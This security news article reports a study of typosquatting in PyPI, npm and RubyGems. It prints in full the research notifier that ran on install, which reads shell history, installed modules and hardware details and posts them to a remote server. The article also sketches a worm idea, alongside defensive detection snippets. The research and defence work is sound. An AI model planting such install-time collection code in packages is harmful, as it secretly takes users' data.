Typosquatting in Python, Node.js, and Ruby repositories

    The attack has been shown to work for distributing malicious code through the PyPI (Python), npmjs.com (Node.js) and rubygems.org (Ruby) repositories


    It turns out that typosquatting works for more than domain names. German security specialist Nikolai Tschacher has demonstrated how easy it is to distribute malicious code through PyPI, the index of software written in the Python programming language, as well as through the Node.js (npmjs.com) and Ruby (rubygems.org) repositories.

    The idea is simple: publish a package with a typo in its name, then wait for someone to make the same typo in their console:

    > sudo pip install reqeusts


    In a small experiment carried out for research purposes, Nikolai infected 17,000 computers. 43.6% of the installations were performed with administrator rights, including on servers in the government domains .gov and .mil.

    Typosquatting and bitsquatting
    Attackers have long used typosquatting to draw stray traffic to junk sites like microsodft.com. The attack works because of the law of large numbers: if a billion people type a site's URL into the address bar, about a million of them will make some kind of mistake, and about a thousand will land on the prepared site, where an exploit pack with a fresh 0-day is waiting for them. Alternatively, the squatter can simply run ads on such sites and make money out of thin air.

    Traditional typosquatters register thousands of addresses. Well-run companies register the likely typo variants together with their main domain and set up redirects from them. Some even use typosquatting to capture someone else's traffic: for example, Google redirects traffic from the domain duck.com to itself.

    There is also bitsquatting, an exotic variety of typosquatting that counts on hardware errors rather than human ones. Bitsquatting relies on the fact that, now and then, one of the many devices connected to the Internet accidentally flips a single bit in a DNS query, so that the traffic goes to the attacker's site instead of the original one. The domains chosen for such attacks belong to CDNs and ad networks whose content is loaded by thousands of popular sites, such as fbcdn.net, 2mdn.net and akamai.com.
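
    To make the single-bit idea concrete, here is a minimal sketch that lists the hostnames one flipped bit away from a given domain, for example so that a domain owner can see which variants might be worth registering defensively. The names bitflip_variants and VALID_CHARS are illustrative and do not come from the research described here.

```python
import string

# Characters allowed inside a DNS label: letters, digits and the hyphen.
VALID_CHARS = set(string.ascii_lowercase + string.digits + "-")


def bitflip_variants(domain):
    """Return valid-looking hostnames that differ from `domain` by one flipped bit."""
    variants = set()
    for i, ch in enumerate(domain):
        if ch == ".":
            continue  # leave the label separators untouched
        for bit in range(8):
            flipped = chr(ord(ch) ^ (1 << bit)).lower()
            if flipped not in VALID_CHARS or flipped == ch:
                continue
            candidate = domain[:i] + flipped + domain[i + 1:]
            # A DNS label may not begin or end with a hyphen.
            labels = candidate.split(".")
            if all(not l.startswith("-") and not l.endswith("-") for l in labels):
                variants.add(candidate)
    return variants


if __name__ == "__main__":
    for name in sorted(bitflip_variants("fbcdn.net")):
        print(name)
```

    Flipping the lowest bit of "f", for instance, gives "g", so gbcdn.net appears in the list for fbcdn.net.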

    After studying standard typosquatting, Nikolai Tschacher asked a question: how many people mistype a package name when they install packages manually through a package manager? For example, the pip package manager downloads packages from the PyPI repository. If we create an arbitrary package called reqeusts (anyone can upload to the repository) next to the legitimate requests package, our package will be downloaded and installed by every user who makes that typo when typing the command.
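
    On the defensive side, a name can be compared against the packages you actually expect to install before anything is downloaded. The sketch below uses difflib from the standard library; the KNOWN_PACKAGES list, the 0.8 cutoff and the function name suspicious_match are assumptions made for illustration, not part of pip or of the research.

```python
import difflib

# Hypothetical allowlist; in practice it might be built from your requirements files.
KNOWN_PACKAGES = ["requests", "numpy", "django", "flask", "urllib3"]


def suspicious_match(name, known=KNOWN_PACKAGES, cutoff=0.8):
    """Return the known package that `name` closely resembles.

    Returns None when `name` is itself a known package or resembles none of them.
    """
    name = name.lower()
    if name in known:
        return None
    close = difflib.get_close_matches(name, known, n=1, cutoff=cutoff)
    return close[0] if close else None


if __name__ == "__main__":
    for candidate in ("requests", "reqeusts", "somethingelse"):
        hit = suspicious_match(candidate)
        if hit:
            print("{!r} looks like a typo of {!r}".format(candidate, hit))
```

    A similarity cutoff is a blunt instrument: set too low it flags unrelated names, set too high it misses longer typos, so the value would need tuning against a real package list.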

    To test the effectiveness of the attack, Nikolai created 214 packages with various kinds of typos in their names, including names of standard library modules that were not registered in the repository (for example, urllib2), and kept them in the repositories for several months in the second half of 2015 and early 2016.
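
    What "various kinds of typos" can look like is easy to sketch. The function below generates three common single-edit classes (an omitted character, a doubled character, two adjacent characters swapped), which a package maintainer could use to check whether lookalike names of their project are already taken. These three classes are an assumption for illustration; the categories actually used in the thesis are not reproduced here.

```python
def typo_variants(name):
    """Return single-edit typo candidates for a package name."""
    variants = set()
    for i in range(len(name)):
        # Omitted character: "requests" -> "requsts"
        variants.add(name[:i] + name[i + 1:])
        # Doubled character: "requests" -> "rrequests"
        variants.add(name[:i] + name[i] * 2 + name[i + 1:])
        # Adjacent characters swapped: "requests" -> "reqeusts"
        if i + 1 < len(name):
            variants.add(name[:i] + name[i + 1] + name[i] + name[i + 2:])
    variants.discard(name)  # swapping two identical letters changes nothing
    return variants


if __name__ == "__main__":
    print(sorted(typo_variants("requests")))
```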

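    In the Python packages, the malicious code was hidden in the setup.py file, which pip executes during installation with the privileges of the user running it (root, in the case of sudo pip install). For NPM modules a pre-installation script was written, while the Ruby packages took more tinkering.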
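
    Because setup.py is ordinary Python that runs at install time, it can be worth reading before installing an unfamiliar source distribution. The sketch below pulls setup.py out of a .tar.gz archive without executing it and reports imports from a small watch list. WATCHED_MODULES, watched_imports and scan_sdist are illustrative names, the watch list is deliberately incomplete, and the parser only understands syntax supported by the Python version running it.

```python
import ast
import io
import tarfile

# Modules whose use in setup.py merits a closer look (illustrative, not exhaustive).
WATCHED_MODULES = {"urllib", "urllib2", "socket", "subprocess", "ctypes", "requests"}


def watched_imports(source):
    """Return the watched top-level modules imported by the given Python source."""
    found = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            names = [alias.name for alias in node.names]
        elif isinstance(node, ast.ImportFrom):
            names = [node.module or ""]
        else:
            continue
        found.update(n.split(".")[0] for n in names)
    return found & WATCHED_MODULES


def scan_sdist(sdist_bytes):
    """Inspect setup.py inside a .tar.gz source distribution without running it."""
    with tarfile.open(fileobj=io.BytesIO(sdist_bytes), mode="r:gz") as archive:
        for member in archive.getmembers():
            if member.isfile() and member.name.split("/")[-1] == "setup.py":
                raw = archive.extractfile(member).read()
                return watched_imports(raw.decode("utf-8", "replace"))
    return set()
```

    A clean result proves little, since code can be obfuscated or loaded indirectly; a hit is only a prompt to open the file and read it.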

    Whenever one of the dummy typosquatting packages was installed, a notification was sent to the server with the IP address, operating system, user privileges and a timestamp.

    Notifier code
    #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    """
    Notification program used in the typo squatting
    bachelor thesis for the python package index.
    Created in autumn 2015.
    Copyright by Nikolai Tschacher
    """
    import os
    import ctypes
    import sys
    import platform
    import subprocess
    debug = False
    # we are using Python3
    if sys.version_info[0] == 3:
      import urllib.request
      from urllib.parse import urlencode
      GET = urllib.request.urlopen
      def python3POST(url, data={}, headers=None):
        """
        Returns the response of the POST request as string or
        False if the resource could not be accessed.
        """
        data = urllib.parse.urlencode(data).encode()
        request = urllib.request.Request(url, data)
        try:
          response = urllib.request.urlopen(request, timeout=15)
          cs = response.headers.get_content_charset()
          if cs:
            return response.read().decode(cs)
          else:
            return response.read().decode('utf-8')
        except urllib.error.HTTPError as he:
          # try again if some 400 or 500 error was received
          return ''
        except Exception as e:
          # everything else fails
          return False
      POST = python3POST
    # we are using Python2
    else:
      import urllib2
      from urllib import urlencode
      GET = urllib2.urlopen
      def python2POST(url, data={}, headers=None):
        """
        See python3POST
        """
        req = urllib2.Request(url, urlencode(data))
        try:
          response = urllib2.urlopen(req, timeout=15)
          return response.read()
        except urllib2.HTTPError as he:
          return ''
        except Exception as e:
          return False
      POST = python2POST
    try:
      from subprocess import DEVNULL # py3k
    except ImportError:
      DEVNULL = open(os.devnull, 'wb')
    def get_command_history():
      if os.name == 'nt':
        # handle windows
        # http://serverfault.com/questions/95404/
        #is-there-a-global-persistent-cmd-history
        # apparently, there is no history in windows :(
        return ''
      elif os.name == 'posix':
        # handle linux and mac
        cmd = 'cat {}/.bash_history | grep -E "pip[23]? install"'
        return os.popen(cmd.format(os.path.expanduser('~'))).read()
    def get_hardware_info():
      if os.name == 'nt':
        # handle windows
        return platform.processor()
      elif os.name == 'posix':
        # handle linux and mac
        if sys.platform.startswith('linux'):
          try:
            hw_info = subprocess.check_output('lshw -short',
                       stderr=DEVNULL, shell=True)
          except:
            hw_info = ''
          if not hw_info:
            try:
              hw_info = subprocess.check_output('lspci',
                       stderr=DEVNULL, shell=True)
            except:
              hw_info = ''
            hw_info += '\n' +\
              os.popen('free -m').read().strip()
          return hw_info
        elif sys.platform == 'darwin':
          # According to https://developer.apple.com/library/
          # mac/documentation/Darwin/Reference/ManPages/
          # man8/system_profiler.8.html
          # no personal information is provided by detailLevel: mini
          return os.popen('system_profiler -detailLevel mini').read()
    def get_all_installed_modules():
      # first try the default path
      pip_list = os.popen('pip list').read().strip()
      if pip_list:
        return pip_list
      else:
        if os.name == 'nt':
          paths = ('C:/Python27',
               'C:/Python34',
               'C:/Python26',
               'C:/Python33',
               'C:/Python35',
               'C:/Python',
               'C:/Python2',
               'C:/Python3')
          # try some paths that make sense to me
          for loc in paths:
            pip_location = os.path.join(loc, 'Scripts/pip.exe')
            if os.path.exists(pip_location):
              cmd = '{} list'.format(pip_location)
              try:
                pip_list = subprocess.check_output(cmd,
                       stderr=DEVNULL, shell=True)
              except:
                pip_list = ''
              if pip_list:
                return pip_list
      return ''
    def notify_home(url, package_name, intended_package_name):
      host_os = platform.platform()
      try:
        admin_rights = bool(os.getuid() == 0)
      except AttributeError:
        try:
          ret = ctypes.windll.shell32.IsUserAnAdmin()
          admin_rights = bool(ret != 0)
        except:
          admin_rights = False
      if os.name != 'nt':
        try:
          pip_version = os.popen('pip --version').read()
        except:
          pip_version = ''
      else:
        pip_version = platform.python_version()
      url_data = {
        'p1': package_name,
        'p2': intended_package_name,
        'p3': 'pip',
        'p4': host_os,
        'p5': admin_rights,
        'p6': pip_version,
      }
      post_data = {
        'p7': get_command_history(),
        'p8': get_all_installed_modules(),
        'p9': get_hardware_info(),
      }
      url_data = urlencode(url_data)
      response = POST(url + url_data, post_data)
      if debug:
        print(response)
      print('')
      print("Warning!!! Maybe you made a typo in your installation\
       command or the module does only exist in the python stdlib?!")
      print("Did you want to install '{}'\
       instead of '{}'??!".format(intended_package_name, package_name))
      print('For more information, please\
       visit http://svs-repo.informatik.uni-hamburg.de/')
    def main():
      if debug:
        notify_home('http://localhost:8000/app/?',
                 'pmba_basic', 'pmba_basic')
      else:
        notify_home('http://svs-repo.informatik.uni-hamburg.de/app/?',
                         'pmba_basic', 'pmba_basic')
    if __name__ == '__main__':
      main()

    The results were striking. The notification server received 45,334 installation notifications from 17,289 unique IP addresses.

    The dummy PyPI packages accounted for most of the installations: 15,221 unique IP addresses. Rubygems.org had 1,631 installations and NPM 525. On average, each package was installed 92 times; the most popular was urllib2, with 3,929 unique installations.



    The victims were spread across operating systems: Linux (8,614), Windows (6,174), OS X (4,758) and other systems (57).

    The mapping of IP addresses to hosts gave the following picture.

    [Figure: hosts by country]


    The full research results are published in Nikolai Tschacher's thesis.

    The author also suggests that this type of attack could be used to spread a worm that mines the console command history on Linux and OS X for new typos that are not yet in its database.

    In theory, such a worm could find new attack vectors (new typos) on its own, generate new packages, upload them to the repository along with its own code, and thus spread further.
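
    The same command history can be turned to the user's advantage: auditing your own past pip install commands shows whether a mistyped name was ever installed. The sketch below works on history text passed in as a string; the regular expression, the function names and the idea of a "known" set are assumptions for illustration, and options that take an argument (such as -r requirements.txt) are not handled.

```python
import re

# Matches "pip install ...", "pip2 install ..." or "pip3 install ...",
# optionally preceded by sudo.
PIP_INSTALL = re.compile(r"^\s*(?:sudo\s+)?pip[23]?\s+install\s+(.+)$")


def installed_names(history_text):
    """Extract package names from pip install commands in shell history text."""
    names = []
    for line in history_text.splitlines():
        match = PIP_INSTALL.match(line)
        if not match:
            continue
        for token in match.group(1).split():
            if token.startswith("-"):
                continue  # skip flags such as --upgrade
            # Drop version specifiers and extras, e.g. "requests==2.9.1".
            names.append(re.split(r"[=<>!~\[]", token, maxsplit=1)[0].lower())
    return names


def unrecognized(history_text, known):
    """Return installed names that are not in the set of packages you expect."""
    return [n for n in installed_names(history_text) if n not in known]


if __name__ == "__main__":
    sample = "ls -la\nsudo pip install reqeusts\npip3 install --upgrade Django==1.9 flask\n"
    print(unrecognized(sample, {"requests", "django", "flask"}))
```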
